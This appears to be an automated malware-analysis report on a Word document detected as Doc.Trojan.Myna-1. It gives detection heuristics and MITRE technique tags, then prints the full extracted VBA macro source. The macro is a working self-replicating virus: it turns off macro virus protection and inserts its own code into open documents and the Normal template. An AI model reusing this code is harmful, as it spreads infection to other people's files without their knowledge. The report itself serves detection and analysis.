MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature Doc.Trojan.Myna-1. It contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The VBA script attempts to insert code into the document's template, suggesting an effort to establish persistence or download further malicious content.
Heuristics 3
-
ClamAV: Doc.Trojan.Myna-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Myna-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3367 bytes |
SHA-256: 60425e9f6373cecab0a831e35d52d838b7d413b51791efb0c45a3a2d37316d3f |
|||
|
Detection
ClamAV:
Doc.Trojan.Myna-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
Dim stato As Boolean
Dim flagaltro As Boolean
Dim flagio As Boolean
Dim count As Integer
Dim stress As String
Dim bry As Variant
On Error Resume Next
End Sub
Private Sub Document_New()
'
Dim aready As Boolean
Dim star As Long
Dim send As Long
Dim answer As String
Dim path$
Options.VirusProtection = False
answer = ""
star = 1
send = 1
path$ = Options.DefaultFilePath(wdUserTemplatesPath)
If count <> 1 Then
count = count + 1
' Documents.Add
End If
If Documents.count <> 0 Then
For i = 1 To Documents.count
For Each xitem In Documents(i).VBProject.VBComponents
' If xitem.Name = "NewMacros" Then
If xitem.Name = "ThisDocument" Then
send = xitem.codemodule.countoflines
aready = xitem.codemodule.Find("MYNAMEISVIRUS", star, 1, star + send, 1)
If aready = False Then
With xitem.codemodule
.insertlines star, MacroContainer.VBProject.VBComponents(1).codemodule.Lines(1, 150) 'codemodule.procbodyline("Autoexec", vbext_pk_Proc)
End With
End If
End If
Next
Next
End If
For Each xitem In NormalTemplate.VBProject.VBComponents
If xitem.Name = "ThisDocument" Then
send = xitem.codemodule.countoflines
aready = xitem.codemodule.Find("MYNAMEISVIRUS", star, 1, send, 1)
If aready = False Then
With xitem.codemodule
.insertlines star, MacroContainer.VBProject.VBComponents(1).codemodule.Lines(1, 150) 'codemodule.procbodyline("Autoexec", vbext_pk_Proc)
End With
End If
End If
Next
End Sub
Private Sub Document_Open()
Dim aready As Boolean
Dim star As Long
Dim send As Long
Dim answer As String
Dim path$
answer = "MYNAMEISVIRUS"
Options.VirusProtection = False
star = 1
send = 1
path$ = Options.DefaultFilePath(wdUserTemplatesPath)
If count <> 1 Then
count = count + 1
' Documents.Add
End If
If Documents.count <> 0 Then
For i = 1 To Documents.count
For Each xitem In Documents(i).VBProject.VBComponents
' If xitem.Name = "NewMacros" Then
If xitem.Name = "ThisDocument" Then
send = xitem.codemodule.countoflines
aready = xitem.codemodule.Find("MYNAMEISVIRUS", star, 1, star + send, 1)
If aready = False Then
With xitem.codemodule
.insertlines star, MacroContainer.VBProject.VBComponents(1).codemodule.Lines(1, 150) 'codemodule.procbodyline("Autoexec", vbext_pk_Proc)
End With
End If
End If
Next
Next
End If
For Each xitem In NormalTemplate.VBProject.VBComponents
If xitem.Name = "ThisDocument" Then
send = xitem.codemodule.countoflines
aready = xitem.codemodule.Find("MYNAMEISVIRUS", star, 1, send, 1)
If aready = False Then
With xitem.codemodule
.insertlines star, MacroContainer.VBProject.VBComponents(1).codemodule.Lines(1, 150) 'codemodule.procbodyline("Autoexec", vbext_pk_Proc)
End With
End If
End If
Next
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.